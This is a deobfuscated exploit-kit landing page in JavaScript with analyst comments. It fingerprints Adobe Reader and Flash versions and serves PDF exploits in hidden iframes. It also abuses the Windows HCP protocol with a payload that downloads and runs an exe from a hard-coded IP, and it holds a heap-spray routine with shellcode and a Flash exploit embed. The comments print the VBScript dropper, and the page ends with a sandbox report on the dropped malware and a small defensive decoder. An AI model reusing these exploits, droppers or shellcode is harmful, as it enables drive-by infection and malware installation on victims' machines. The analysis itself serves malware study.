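/* Paste everything inside a="..." into decodeTokenLayer() and you get the same text w(c) would have
   evaluated; nothing here executes it. */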
/* ------------------------------------------------------ */
/* ------------------------------------------------------ */
/* ------------------------------------------------------ */
/* ------------- Deobfuscated Code Below ---------------- */
/* ------------------------------------------------------ */
document.write('<center><h1>Please wait while loading...</h1><img src="loading_animation.gif" alt="loading content animation"><br><br><hr><p>We processing your request, please be patient for a while.</p></center><hr>');
function end_redirect() {
window.location.href = '/welcome.php';
}
var pdfver = [0, 0, 0, 0],
flashver = [0, 0, 0, 0];
try {
var PluginDetect = {
version: "0.7.6",
name: "PluginDetect",
handler: function (c, b, a) {
return function () {
c(b, a)
}
},
isDefined: function (b) {
return typeof b != "undefined"
},
isArray: function (b) {
return(/array/i).test(Object.prototype.toString.call(b))
},
isFunc: function (b) {
return typeof b == "function"
},
isString: function (b) {
return typeof b == "string"
},
isNum: function (b) {
return typeof b == "number"
},
isStrNum: function (b) {
return(typeof b == "string" && (/\d/).test(b))
},
getNumRegx: /[\d][\d\.\_,-]*/,
splitNumRegx: /[\.\_,-]/g,
getNum: function (b, c) {
var d = this,
a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
return a ? a[0] : null
},
compareNums: function (h, f, d) {
var e = this,
c, b, a, g = parseInt;
if(e.isStrNum(h) && e.isStrNum(f)) {
if(e.isDefined(d) && d.compareNums) {
return d.compareNums(h, f)
}
c = h.split(e.splitNumRegx);
b = f.split(e.splitNumRegx);
for(a = 0; a < Math.min(c.length, b.length); a++) {
if(g(c[a], 10) > g(b[a], 10)) {
return 1
}
if(g(c[a], 10) < g(b[a], 10)) {
return -1
}
}
}
return 0
},
formatNum: function (b, c) {
var d = this,
a, e;
if(!d.isStrNum(b)) {
return null
}
if(!d.isNum(c)) {
c = 4
}
c--;
e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
for(a = 0; a < 4; a++) {
if(/^(0+)(.+)$/.test(e[a])) {
e[a] = RegExp.$2
}
if(a > c || !(/\d/).test(e[a])) {
e[a] = "0"
}
}
return e.slice(0, 4).join(",")
},
$$hasMimeType: function (a) {
return function (d) {
if(!a.isIE && d) {
var c, b, e, f = a.isString(d) ? [d] : d;
if(!f || !f.length) {
return null
}
for(e = 0; e < f.length; e++) {
if(/[^\s]/.test(f[e]) && (c = navigator.mimeTypes[f[e]]) && (b = c.enabledPlugin) && (b.name || b.description)) {
return c
}
}
}
return null
}
},
findNavPlugin: function (l, e, c) {
var j = this,
h = new RegExp(l, "i"),
d = (!j.isDefined(e) || e) ? /\d/ : 0,
k = c ? new RegExp(c, "i") : 0,
a = navigator.plugins,
g = "",
f, b, m;
for(f = 0; f < a.length; f++) {
m = a[f].description || g;
b = a[f].name || g;
if((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
if(!k || !(k.test(m) || k.test(b))) {
return a[f]
}
}
}
return null
},
getMimeEnabledPlugin: function (k, m, c) {
var e = this,
f, b = new RegExp(m, "i"),
h = "",
g = c ? new RegExp(c, "i") : 0,
a, l, d, j = e.isString(k) ? [k] : k;
for(d = 0; d < j.length; d++) {
if((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)) {
l = f.description || h;
a = f.name || h;
if(b.test(l) || b.test(a)) {
if(!g || !(g.test(l) || g.test(a))) {
return f
}
}
}
}
return 0
},
getPluginFileVersion: function (f, b) {
var h = this,
e, d, g, a, c = -1;
if(h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
return b
}
if(!b) {
return e
}
e = h.formatNum(e);
b = h.formatNum(b);
d = b.split(h.splitNumRegx);
g = e.split(h.splitNumRegx);
for(a = 0; a < d.length; a++) {
if(c > -1 && a > c && d[a] != "0") {
return b
}
if(g[a] != d[a]) {
if(c == -1) {
c = a
}
if(d[a] != "0") {
return b
}
}
}
return e
},
AXO: window.ActiveXObject,
getAXO: function (a) {
var f = null,
d, b = this,
c = {};
try {
f = new b.AXO(a)
} catch(d) {}
return f
},
convertFuncs: function (g) {
var a, h, f, b = /^[\$][\$]/,
d = {},
c = this;
for(a in g) {
if(b.test(a)) {
d[a] = 1
}
}
for(a in d) {
try {
h = a.slice(2);
if(h.length > 0 && !g[h]) {
g[h] = g[a](g);
delete g[a]
}
} catch(f) {}
}
},
initScript: function () {
var c = this,
a = navigator,
e = "/",
i = a.userAgent || "",
g = a.vendor || "",
b = a.platform || "",
h = a.product || "";
if(c.file) {
c.file.$ = c
}
if(c.verify) {
c.verify.$ = c
};
c.OS = 100;
if(b) {
var f, d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "", 100];
for(f = d.length - 2; f >= 0; f = f - 2) {
if(d[f] && new RegExp(d[f], "i").test(b)) {
c.OS = d[f + 1];
break
}
}
}
c.convertFuncs(c);
c.isIE = new Function("return " + e + "*@cc_on!@*" + e + "false")();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
c.ActiveXEnabled = false;
if(c.isIE) {
var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
for(f = 0; f < j.length; f++) {
if(c.getAXO(j[f])) {
c.ActiveXEnabled = true;
break
}
}
c.head = c.isDefined(document.getElementsByTagName) ? document.getElementsByTagName("head")[0] : null
}
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null;
c.isSafari = (/Safari\s*\/\s*\d/i).test(i) && (/Apple/i).test(g);
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null;
c.addWinEvent("load", c.handler(c.runWLfuncs, c))
},
init: function (c) {
var b = this,
a, c;
if(!b.isString(c)) {
return -3
}
if(c.length == 1) {
b.getVersionDelimiter = c;
return -3
}
c = c.toLowerCase().replace(/\s/g, "");
a = b[c];
if(!a || !a.getVersion) {
return -3
}
b.plugin = a;
if(!b.isDefined(a.installed)) {
a.installed = a.version = a.version0 = a.getVersionDone = null;
a.$ = b;
a.pluginName = c
}
b.garbage = false;
if(b.isIE && !b.ActiveXEnabled) {
if(a !== b.java) {
return -2
}
}
return 1
},
fPush: function (b, a) {
var c = this;
if(c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0])))) {
a.push(b)
}
},
callArray: function (b) {
var c = this,
a;
if(c.isArray(b)) {
for(a = 0; a < b.length; a++) {
if(b[a] === null) {
return
}
c.call(b[a]);
b[a] = null
}
}
},
call: function (c) {
var b = this,
a = b.isArray(c) ? c.length : -1;
if(a > 0 && b.isFunc(c[0])) {
c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
} else {
if(b.isFunc(c)) {
c(b)
}
}
},
getVersionDelimiter: ", ",
$$getVersion: function (a) {
return function (g, d, c) {
var e = a.init(g),
f, b, h = {};
if(e < 0) {
return null
};
f = a.plugin;
if(f.getVersionDone != 1) {
f.getVersion(null, d, c);
if(f.getVersionDone === null) {
f.getVersionDone = 1
}
}
a.cleanup();
b = (f.version || f.version0);
b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
return b
}
},
cleanup: function () {},
addWinEvent: function (d, c) {
var e = this,
a = window,
b;
if(e.isFunc(c)) {
if(a.addEventListener) {
a.addEventListener(d, c, false)
} else {
if(a.attachEvent) {
a.attachEvent("on" + d, c)
} else {
b = a["on" + d];
a["on" + d] = e.winHandler(c, b)
}
}
}
},
winHandler: function (d, c) {
return function () {
d();
if(typeof c == "function") {
c()
}
}
},
WLfuncs0: [],
WLfuncs: [],
runWLfuncs: function (a) {
var b = {};
a.winLoaded = true;
a.callArray(a.WLfuncs0);
a.callArray(a.WLfuncs);
if(a.onDoneEmptyDiv) {
a.onDoneEmptyDiv()
}
},
winLoaded: false,
$$onWindowLoaded: function (a) {
return function (b) {
if(a.winLoaded) {
a.call(b)
} else {
a.fPush(b, a.WLfuncs)
}
}
},
div: null,
divID: "plugindetect",
divWidth: 50,
pluginSize: 1,
emptyDiv: function () {
var d = this,
b, h, c, a, f, g;
if(d.div && d.div.childNodes) {
for(b = d.div.childNodes.length - 1; b >= 0; b--) {
c = d.div.childNodes[b];
if(c && c.childNodes) {
for(h = c.childNodes.length - 1; h >= 0; h--) {
g = c.childNodes[h];
try {
c.removeChild(g)
} catch(f) {}
}
}
if(c) {
try {
d.div.removeChild(c)
} catch(f) {}
}
}
}
if(!d.div) {
a = document.getElementById(d.divID);
if(a) {
d.div = a
}
}
if(d.div && d.div.parentNode) {
try {
d.div.parentNode.removeChild(d.div)
} catch(f) {}
d.div = null
}
},
DONEfuncs: [],
onDoneEmptyDiv: function () {
var c = this,
a, b;
if(!c.winLoaded) {
return
}
if(c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
return
}
for(a in c) {
b = c[a];
if(b && b.funcs) {
if(b.OTF == 3) {
return
}
if(b.funcs.length && b.funcs[b.funcs.length - 1] !== null) {
return
}
}
}
for(a = 0; a < c.DONEfuncs.length; a++) {
c.callArray(c.DONEfuncs)
}
c.emptyDiv()
},
getWidth: function (c) {
if(c) {
var a = c.scrollWidth || c.offsetWidth,
b = this;
if(b.isNum(a)) {
return a
}
}
return -1
},
getTagStatus: function (m, g, a, b) {
var c = this,
f, k = m.span,
l = c.getWidth(k),
h = a.span,
j = c.getWidth(h),
d = g.span,
i = c.getWidth(d);
if(!k || !h || !d || !c.getDOMobj(m)) {
return -2
}
if(j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1) {
return 0
}
if(l >= i) {
return -1
}
try {
if(l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
if(!m.winLoaded && c.winLoaded) {
return 1
}
if(m.winLoaded && c.isNum(b)) {
if(!c.isNum(m.count)) {
m.count = b
}
if(b - m.count >= 10) {
return 1
}
}
}
} catch(f) {}
return 0
},
getDOMobj: function (g, a) {
var f, d = this,
c = g ? g.span : 0,
b = c && c.firstChild ? 1 : 0;
try {
if(b && a) {
c.firstChild.focus()
}
} catch(f) {}
return b ? c.firstChild : null
},
setStyle: function (b, g) {
var f = b.style,
a, d, c = this;
if(f && g) {
for(a = 0; a < g.length; a = a + 2) {
try {
f[g[a]] = g[a + 1]
} catch(d) {}
}
}
},
insertDivInBody: function (a, i) {
var h, f = this,
b = "pd33993399",
d = null,
j = i ? window.top.document : window.document,
c = "<",
g = (j.getElementsByTagName("body")[0] || j.body);
if(!g) {
try {
j.write(c + 'div id="' + b + '">o' + c + "/div>");
d = j.getElementById(b)
} catch(h) {}
}
g = (j.getElementsByTagName("body")[0] || j.body);
if(g) {
if(g.firstChild && f.isDefined(g.insertBefore)) {
g.insertBefore(a, g.firstChild)
} else {
g.appendChild(a)
}
if(d) {
g.removeChild(d)
}
} else {}
},
insertHTML: function (g, b, h, a, k) {
var l, m = document,
j = this,
p, o = m.createElement("span"),
n, i, f = "<";
var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
if(!j.isDefined(a)) {
a = ""
}
if(j.isString(g) && (/[^\s]/).test(g)) {
p = f + g + ' width="' + j.pluginSize + '" height="' + j.pluginSize + '" ';
for(n = 0; n < b.length; n = n + 2) {
if(/[^\s]/.test(b[n + 1])) {
p += b[n] + '="' + b[n + 1] + '" '
}
}
p += ">";
for(n = 0; n < h.length; n = n + 2) {
if(/[^\s]/.test(h[n + 1])) {
p += f + 'param name="' + h[n] + '" value="' + h[n + 1] + '" />'
}
}
p += a + f + "/" + g + ">"
} else {
p = a
}
if(!j.div) {
i = m.getElementById(j.divID);
if(i) {
j.div = i
} else {
j.div = m.createElement("div");
j.div.id = j.divID;
j.insertDivInBody(j.div)
}
j.setStyle(j.div, c.concat(["width", j.divWidth + "px", "height", (j.pluginSize + 3) + "px", "fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
if(!i) {
j.setStyle(j.div, ["position", "absolute", "right", "0px", "top", "0px"])
}
}
if(j.div && j.div.parentNode) {
j.div.appendChild(o);
j.setStyle(o, c.concat(["fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
try {
if(o && o.parentNode) {
o.focus()
}
} catch(l) {}
try {
o.innerHTML = p
} catch(l) {}
if(o.childNodes.length == 1 && !(j.isGecko && j.compareNums(j.verGecko, "1,5,0,0") < 0)) {
j.setStyle(o.firstChild, c.concat(["display", "inline"]))
}
return {
span: o,
winLoaded: j.winLoaded,
tagName: (j.isString(g) ? g : "")
}
}
return {
span: null,
winLoaded: j.winLoaded,
tagName: ""
}
},
flash: {
mimeType: "application/x-shockwave-flash",
progID: "ShockwaveFlash.ShockwaveFlash",
classID: "clsid:D27CDB6E-AE6D-11CF-96B8-444553540000",
getVersion: function () {
var b = function (i) {
if(!i) {
return null
}
var e = /[\d][\d\,\.\s]*[rRdD]{0,1}[\d\,]*/.exec(i);
return e ? e[0].replace(/[rRdD\.]/g, ",").replace(/\s/g, "") : null
};
var j = this, g = j.$, k, h, l = null, c = null, a = null, f, m, d;
if(!g.isIE) {
m = g.hasMimeType(j.mimeType);
if(m) {
f = g.getDOMobj(g.insertHTML("object", ["type", j.mimeType], [], "", j));
try {
l = g.getNum(f.GetVariable("$version"))
} catch(k) {}
}
if(!l) {
d = m ? m.enabledPlugin : null;
if(d && d.description) {
l = b(d.description)
}
if(l) {
l = g.getPluginFileVersion(d, l)
}
}
} else {
for(h = 15; h > 2; h--) {
c = g.getAXO(j.progID + "." + h);
if(c) {
a = h.toString();
break
}
}
if(!c) {
c = g.getAXO(j.progID)
}
if(a == "6") {
try {
c.AllowScriptAccess = "always"
} catch(k) {
return "6,0,21,0"
}
}
try {
l = b(c.GetVariable("$version"))
} catch(k) {}
if(!l && a) {
l = a
}
}
j.installed = l ? 1 : -1;
j.version = g.formatNum(l);
return true
}
},
adobereader: {
mimeType: "application/pdf",
navPluginObj: null,
progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
INSTALLED: {},
pluginHasMimeType: function (d, c, f) {
var b = this,
e = b.$,
a;
for(a in d) {
if(d[a] && d[a].type && d[a].type == c) {
return 1
}
}
if(e.getMimeEnabledPlugin(c, f)) {
return 1
}
return 0
},
getVersion: function (l, j) {
var g = this,
d = g.$,
i, f, m, n, b = null,
h = null,
k = g.mimeType,
a, c;
if(d.isString(j)) {
j = j.replace(/\s/g, "");
if(j) {
k = j
}
} else {
j = null
}
if(d.isDefined(g.INSTALLED[k])) {
g.installed = g.INSTALLED[k];
return
}
if(!d.isIE) {
a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
if(g.getVersionDone !== 0) {
g.getVersionDone = 0;
b = d.getMimeEnabledPlugin(g.mimeType, a);
if(!j) {
n = b
}
if(!b && d.hasMimeType(g.mimeType)) {
b = d.findNavPlugin(a, 0)
}
if(b) {
g.navPluginObj = b;
h = d.getNum(b.description) || d.getNum(b.name);
h = d.getPluginFileVersion(b, h);
if(!h && d.OS == 1) {
if(g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)) {
h = "9"
} else {
if(g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)) {
h = "8"
}
}
}
}
} else {
h = g.version
}
if(!d.isDefined(n)) {
n = d.getMimeEnabledPlugin(k, a)
}
g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1))
} else {
b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
c = /=\s*([\d\.]+)/g;
try {
f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src", ""], "", g))).GetVersions();
for(m = 0; m < 5; m++) {
if(c.test(f) && (!h || RegExp.$1 > h)) {
h = RegExp.$1
}
}
} catch(i) {}
g.installed = h ? 1 : (b ? 0 : -1)
}
if(!g.version) {
g.version = d.formatNum(h)
}
g.INSTALLED[k] = g.installed
}
},
zz: 0
};
PluginDetect.initScript();
PluginDetect.getVersion(".");
pdfver = PluginDetect.getVersion("AdobeReader");
flashver = PluginDetect.getVersion('Flash');
} catch(e) {}
if(typeof pdfver == 'string') {
pdfver = pdfver.split('.')
} else {
pdfver = [0, 0, 0, 0]
}
if(typeof flashver == 'string') {
flashver = flashver.split('.')
} else {
flashver = [0, 0, 0, 0]
};
exec7 = 1;
function spl0() {
spl2()
}
function spl2() {
spl3()
}
function show_pdf(src) {
var pifr = document.createElement('IFRAME');
pifr.setAttribute('width', 1);
pifr.setAttribute('height', 1);
pifr.setAttribute('src', src);
document.body.appendChild(pifr)
}
function spl3() {
if(pdfver[0] > 0 && pdfver[0] < 8) {
exec7 = 0;
show_pdf('./content/ap1.php?f=b6863')
} else if((pdfver[0] == 8) || (pdfver[0] == 9 && pdfver[1] <= 3)) {
exec7 = 0;
show_pdf('./content/ap2.php?f=b6863')
}
spl4()
}
function spl4() {
var m = document.createElement('IFRAME');
/* below comes out to be:
cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://50.116.17.63/stats/content/hcp_vbs.php?f=b6863&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe
*/
m.setAttribute('src', 'hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%..%5C..%5Csysinfomain.htm%u003fsvr=<scr' + 'ipt defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,53,48,46,49,49,54,46,49,55,46,54,51,47,115,116,97,116,115,47,99,111,110,116,101,110,116,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,98,54,56,54,51,38,100,61,48,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</scr' + 'ipt>');
/* The above fetches http://50.116.17.63/stats/content/hcp_vbs.php?f=b6863&d=0 for its instructions (the VBScript below),
which in turn downloads http://50.116.17.63/stats/w.php?e=5&f=b6863 and executes it as an exe.
Reflowed one statement per line; the StrReverse()/Replace() tricks are glossed in the // comments:
w=3000:
x=200:
y=1:
z=false:
a = "http://50.116.17.63/stats/w.php?e=5&f=b6863":
Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):     // Scripting.FileSystemObject
Set f=e.GetSpecialFolder(2):                                         // GetSpecialFolder(2) is the temp folder
b = f & "\exe.ex2":
b=Replace(b,Month("2010-02-16"),"e"):                                // Month() is 2, so b becomes <temp>\exe.exe
OT = "GET":
Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):                  // MSXML2.XMLHTTP
Set d = CreateObject(StrReverse("maertS.BDODA")):                    // ADODB.Stream
Set o=Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):        // Scripting.FileSystemObject
On Error resume next
c.open OT, a, z:
c.send()
If c.Status = x Then
d.Open:
d.Type = y:
d.Write c.ResponseBody:
d.SaveToFile b:
d.Close
End If
Set w=CreateObject(StrReverse("llehS." & "tpi"&"rcSW"))              // WScript.Shell
Eval(Replace("W.ex2c b", Month("2010-02-16"), "E"))                  // evaluates to W.exEc b: runs the downloaded exe
W.eXeC "taskkill /F /IM wm" & "player.exe":
W.eXeC "taskkill /F /IM realplay.exe":
Set g=o.GetFile(e.GetSpecialFolder(2) & "\" & StrReverse("bv.l") & "s"):   // l.vbs, the dropper itself
g.Delete:
WScript.Sleep w:
Set g=o.GetFile(b):
Eval("g.Delete")
*/
m.setAttribute('width', 0);
m.setAttribute('height', 0);
document.body['appendChild'](m);
spl5()
}
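/* Added example, not part of the gist or the kit: how the command line quoted in the comment above is
   recovered. It pulls every String.fromCharCode(...) list out of a script fragment and renders it as text,
   and adds a heuristic (an assumption of this example, not a published signature) for the hcp:// search-URL
   shape that carries the payload. The input is a constructed iframe src in the same shape as the one in spl4,
   carrying only the first 14 codes of the list above so it stays readable. */

```javascript
'use strict';

// Matches String.fromCharCode( 99, 109, ... ) with arbitrary whitespace inside the list.
const FCC_RE = /String\.fromCharCode\s*\(\s*([0-9\s,]+?)\s*\)/g;

// Return the decoded text of every fromCharCode list found in `js`, in order.
function decodeFromCharCodeLists(js) {
  const results = [];
  for (const m of js.matchAll(FCC_RE)) {
    const codes = m[1].split(',').map(s => Number(s.trim()));
    // Only plain UTF-16 code units are accepted; anything else is left for manual review.
    if (codes.some(c => !Number.isInteger(c) || c < 0 || c > 0xffff)) continue;
    results.push(String.fromCharCode(...codes));
  }
  return results;
}

// Heuristic for the HCP URL shape used above: an hcp://services/search URL whose
// topic is padded with a long run of %A% and which smuggles a <script> in through svr=.
// This is an assumption of this example, not a vendor signature.
function looksLikeHcpSearchAbuse(url) {
  const u = String(url).replace(/\s+/g, '');   // ignore wrapping or padding from a report
  return /^hcp:\/\/services\/search\?/i.test(u)
    && /(?:%A%){8,}/i.test(u)
    && /svr=<scr/i.test(u);
}

// Constructed sample: same shape as the spl4 iframe src, shortened. The codes
// 99,109,100,... are the first 14 of the list above and spell "cmd /c echo B=".
const SAMPLE_SRC = 'hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm'
  + '%A%'.repeat(12) + '..%5C..%5Csysinfomain.htm%u003fsvr=<scr' + 'ipt defer>'
  + 'eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61)));'
  + '</scr' + 'ipt>';

// Inspect an iframe src (or any script fragment): the verdict plus the decoded strings.
function analyseSrc(src) {
  return { hcpAbuse: looksLikeHcpSearchAbuse(src), decoded: decodeFromCharCodeLists(src) };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(analyseSrc(SAMPLE_SRC)));
}
```

/* Run analyseSrc() over the src attribute of the iframe built in spl4 and the full cmd /c line in the
   comment above falls out; the same extractor works on any fromCharCode-wrapped payload. */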
function getCN() {
return 'content/score.swf'
}
function getBlockSize() {
return 1024
}
function getAllocSize() {
return 1024 * 1024
}
function getAllocCount() {
return 300
}
function getFillBytes() {
var a = '%u' + '0c0c';
return a + a;
}
function getShellCode() {
if(1) {
/* does something then download and exec http://50.116.17.63/stats/w.php?f=b6863&e=4 */
return "%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u52e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u181d%u1906%u1e19%u1906%u061f%u1b1e%u5b07%u495c%u5b5c%u5f07%u5806%u5840%u4e17%u4a15%u101e%u1b1e%u4d0e%u1915%u2828";
}
}
function spl5() {
var ver1 = flashver[0];
var ver2 = flashver[1];
var ver3 = flashver[2];
if(((ver1 == 10 && ver2 == 0 && ver3 > 40) || ((ver1 == 10 && ver2 > 0) && (ver1 == 10 && ver2 < 2))) || ((ver1 == 10 && ver2 == 2 && ver3 < 159) || (ver1 == 10 && ver2 < 2))) {
var fname = "content/field";
var Flash_obj = " < objectclassid ='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000'width = 10height = 10id = 'swf_id' >";
Flash_obj += " < paramname = 'movie'value = '" + fname + ".swf'/>";
al = "always";
Flash_obj += "<param name=\"allowScriptAccess\" value='" + al + "' / >";
Flash_obj += " < paramname = 'Play'value = '0'/>";
Flash_obj += "<embed src='" + fname + ".swf' id='swf_id' name='swf_id'";
Flash_obj += "allowScriptAccess='" + al + "'";
Flash_obj += "type='application/x - shockwave - flash'";
Flash_obj += "width='10' height='10' > ";
Flash_obj += " </ embed > ";
Flash_obj += " </object > ";
var oSpan = document.createElement("span");
document.body.appendChild(oSpan);
oSpan.innerHTML = Flash_obj;
}
setTimeout(end_redirect, 8000);
}
spl0();
/* ********************************* anubis report for exe below: ************************************ */
[#############################################################################]
Analysis Report for bc9deebcb0ccc83e6fff18b5fc924470-b21fa87a3f1c481c5c30916b63034168-1330454785
MD5: 7650a8aa7d4f891982f0ca24a24e9c0c
[#############################################################################]
Summary:
- Write to foreign memory areas:
This executable tampers with the execution of another process.
- Packed Binary:
This executable is protected with a packer in order to prevent it
from being reverse engineered.
- Execution did not terminate correctly:
The executable crashed.
- Autostart capabilities:
This executable registers processes to be executed at system start.
This could result in unwanted actions to be performed automatically.
- Changes security settings of Internet Explorer:
This system alteration could seriously affect safety surfing the World
Wide Web.
- Performs File Modification and Destruction:
The executable modifies and destructs files which are not temporary.
- Spawns Processes:
The executable produces processes during the execution.
- Performs Registry Activities:
The executable creates and/or modifies registry entries.
[=============================================================================]
Table of Contents
[=============================================================================]
- General information
- bc9deebcb0.exe
a) Registry Activities
b) File Activities
c) Process Activities
- KB00983751.exe
a) Registry Activities
b) File Activities
c) Process Activities
- Explorer.EXE
a) Registry Activities
b) File Activities
c) Process Activities
d) Other Activities
- ctfmon.exe
